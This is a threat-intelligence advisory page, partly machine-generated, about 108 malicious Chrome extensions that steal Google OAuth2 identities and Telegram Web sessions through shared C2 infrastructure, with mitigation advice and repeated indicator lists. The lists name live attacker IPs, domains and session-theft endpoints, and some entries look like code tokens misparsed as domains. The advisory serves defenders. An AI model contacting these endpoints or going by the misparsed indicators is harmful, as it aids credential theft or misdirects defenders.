108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure
A coordinated campaign of 108 malicious Chrome extensions operated through shared command-and-control infrastructure at cloudapi[.]stream has been identified, collectively accounting for approximately 20,000 installations. The campaign spans multiple threat categories: 54 extensions steal Google account identities via OAuth2, one extension actively exfiltrates Telegram Web sessions every 15 seconds, and 45 extensions contain a universal backdoor enabling arbitrary URL execution on browser startup. Published under five distinct publisher identities (Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt), these extensions masquerade as legitimate tools including Telegram sidebar clients, slot games, YouTube and TikTok enhancers, and translation utilities. All extensions route stolen credentials, user identities, and browsing data to servers controlled by the same operator, with infrastructure confirming a Malware-as-a-Service business model.
AI Analysis
Technical Summary
This threat campaign consists of 108 malicious Chrome extensions that share a common command-and-control infrastructure hosted at cloudapi.stream. The extensions are categorized into three main groups: 54 that steal Google account credentials via OAuth2, one that exfiltrates Telegram Web sessions every 15 seconds, and 45 that contain a backdoor allowing arbitrary URL execution on browser startup. These extensions masquerade as legitimate applications across various categories and are published under five distinct publisher identities. The campaign's infrastructure and operations suggest a coordinated Malware-as-a-Service business model. There is no indication of vendor patches or official remediation guidance.
Potential Impact
The campaign enables attackers to steal Google account identities, hijack Telegram Web sessions, and execute arbitrary URLs on browser startup, potentially leading to unauthorized access, data theft, and persistent browser compromise. The shared C2 infrastructure consolidates stolen credentials and session data, increasing the scale and impact of the threat. Approximately 20,000 users are estimated to be affected by these malicious extensions. No known exploits in the wild are reported, but the impact on user privacy and security is significant.
Mitigation Recommendations
No official patches or vendor advisories are available for these malicious extensions. The primary mitigation is to identify and remove these extensions from affected browsers. Users should review installed Chrome extensions and uninstall any that are suspicious or match the identified publisher identities (Yana Project, GameGen, SideGames, Rodeo Games, InterAlt). Additionally, users should revoke OAuth2 permissions granted to suspicious extensions via their Google account security settings. Monitoring for unusual account activity and changing passwords for affected accounts is recommended. Since this is not a vulnerability in Chrome itself but malicious extensions, remediation relies on user and administrator action to remove the extensions and revoke permissions.
Indicators of Compromise
- ip: 144.126.135.238
- domain: cloudapi.stream
- domain: interalt.net
- domain: message.data
- domain: nashprom.info
- domain: profile.email
- domain: profile.name
- domain: webuk.tech
- email: support@top.rodeo
- domain: api.cloudapi.stream
- domain: cdn.cloudapi.stream
- domain: chat.cloudapi.stream
- domain: chrome.runtime.id
- domain: coin-miner.cloudapi.stream
- domain: crm.cloudapi.stream
- domain: gamewss.cloudapi.stream
- domain: goldminer.cloudapi.stream
- domain: herculessportslegend.cloudapi.stream
- domain: metal.cloudapi.stream
- domain: mines.cloudapi.stream
- domain: multiaccount.cloudapi.stream
- domain: tg.cloudapi.stream
- domain: topup.cloudapi.stream
- domain: wheel.cloudapi.stream
- url: http://api.cloudapi.stream:8443/Register
- url: http://api.cloudapi.stream:8443/Translation
- url: http://cloudapi.stream/install/
- url: http://cloudapi.stream/uninstall/
- url: http://mines.cloudapi.stream/auth_google
- url: http://mines.cloudapi.stream/slot_test/
- url: http://mines.cloudapi.stream/user_info
- url: http://tg.cloudapi.stream/count_sessions.php
- url: http://tg.cloudapi.stream/delete_session.php
- url: http://tg.cloudapi.stream/get_session.php
- url: http://tg.cloudapi.stream/get_sessions.php
- url: http://tg.cloudapi.stream/save_session.php
- url: http://tg.cloudapi.stream/save_title.php
- url: http://top.rodeo/notify.php
- url: http://top.rodeo/server/remote.php
- url: http://top.rodeo/server/remote3.php
- domain: cloudapi.stream
- domain: api.cloudapi.stream
- domain: mines.cloudapi.stream
- domain: tg.cloudapi.stream
108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure
Description
A coordinated campaign of 108 malicious Chrome extensions operated through shared command-and-control infrastructure at cloudapi[.]stream has been identified, collectively accounting for approximately 20,000 installations. The campaign spans multiple threat categories: 54 extensions steal Google account identities via OAuth2, one extension actively exfiltrates Telegram Web sessions every 15 seconds, and 45 extensions contain a universal backdoor enabling arbitrary URL execution on browser startup. Published under five distinct publisher identities (Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt), these extensions masquerade as legitimate tools including Telegram sidebar clients, slot games, YouTube and TikTok enhancers, and translation utilities. All extensions route stolen credentials, user identities, and browsing data to servers controlled by the same operator, with infrastructure confirming a Malware-as-a-Service business model.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This threat campaign consists of 108 malicious Chrome extensions that share a common command-and-control infrastructure hosted at cloudapi.stream. The extensions are categorized into three main groups: 54 that steal Google account credentials via OAuth2, one that exfiltrates Telegram Web sessions every 15 seconds, and 45 that contain a backdoor allowing arbitrary URL execution on browser startup. These extensions masquerade as legitimate applications across various categories and are published under five distinct publisher identities. The campaign's infrastructure and operations suggest a coordinated Malware-as-a-Service business model. There is no indication of vendor patches or official remediation guidance.
Potential Impact
The campaign enables attackers to steal Google account identities, hijack Telegram Web sessions, and execute arbitrary URLs on browser startup, potentially leading to unauthorized access, data theft, and persistent browser compromise. The shared C2 infrastructure consolidates stolen credentials and session data, increasing the scale and impact of the threat. Approximately 20,000 users are estimated to be affected by these malicious extensions. No known exploits in the wild are reported, but the impact on user privacy and security is significant.
Mitigation Recommendations
No official patches or vendor advisories are available for these malicious extensions. The primary mitigation is to identify and remove these extensions from affected browsers. Users should review installed Chrome extensions and uninstall any that are suspicious or match the identified publisher identities (Yana Project, GameGen, SideGames, Rodeo Games, InterAlt). Additionally, users should revoke OAuth2 permissions granted to suspicious extensions via their Google account security settings. Monitoring for unusual account activity and changing passwords for affected accounts is recommended. Since this is not a vulnerability in Chrome itself but malicious extensions, remediation relies on user and administrator action to remove the extensions and revoke permissions.
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- ["https://socket.dev/blog/108-chrome-ext-linked-to-data-exfil-session-theft-shared-c2"]
- Adversary
- null
- Pulse Id
- 69de5f631a2f4bca81392ccd
- Threat Score
- null
Indicators of Compromise
Ip
| Value | Description | Copy |
|---|---|---|
ip144.126.135.238 | — |
Domain
| Value | Description | Copy |
|---|---|---|
domaincloudapi.stream | — | |
domaininteralt.net | — | |
domainmessage.data | — | |
domainnashprom.info | — | |
domainprofile.email | — | |
domainprofile.name | — | |
domainwebuk.tech | — | |
domainapi.cloudapi.stream | — | |
domaincdn.cloudapi.stream | — | |
domainchat.cloudapi.stream | — | |
domainchrome.runtime.id | — | |
domaincoin-miner.cloudapi.stream | — | |
domaincrm.cloudapi.stream | — | |
domaingamewss.cloudapi.stream | — | |
domaingoldminer.cloudapi.stream | — | |
domainherculessportslegend.cloudapi.stream | — | |
domainmetal.cloudapi.stream | — | |
domainmines.cloudapi.stream | — | |
domainmultiaccount.cloudapi.stream | — | |
domaintg.cloudapi.stream | — | |
domaintopup.cloudapi.stream | — | |
domainwheel.cloudapi.stream | — | |
domaincloudapi.stream | — | |
domainapi.cloudapi.stream | — | |
domainmines.cloudapi.stream | — | |
domaintg.cloudapi.stream | — |
| Value | Description | Copy |
|---|---|---|
emailsupport@top.rodeo | — |
Url
| Value | Description | Copy |
|---|---|---|
urlhttp://api.cloudapi.stream:8443/Register | — | |
urlhttp://api.cloudapi.stream:8443/Translation | — | |
urlhttp://cloudapi.stream/install/ | — | |
urlhttp://cloudapi.stream/uninstall/ | — | |
urlhttp://mines.cloudapi.stream/auth_google | — | |
urlhttp://mines.cloudapi.stream/slot_test/ | — | |
urlhttp://mines.cloudapi.stream/user_info | — | |
urlhttp://tg.cloudapi.stream/count_sessions.php | — | |
urlhttp://tg.cloudapi.stream/delete_session.php | — | |
urlhttp://tg.cloudapi.stream/get_session.php | — | |
urlhttp://tg.cloudapi.stream/get_sessions.php | — | |
urlhttp://tg.cloudapi.stream/save_session.php | — | |
urlhttp://tg.cloudapi.stream/save_title.php | — | |
urlhttp://top.rodeo/notify.php | — | |
urlhttp://top.rodeo/server/remote.php | — | |
urlhttp://top.rodeo/server/remote3.php | — |
Threat ID: 69de616b82d89c981fbc694d
Added to database: 4/14/2026, 3:46:51 PM
Last enriched: 4/14/2026, 4:01:50 PM
Last updated: 5/29/2026, 11:00:04 AM
Views: 301
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.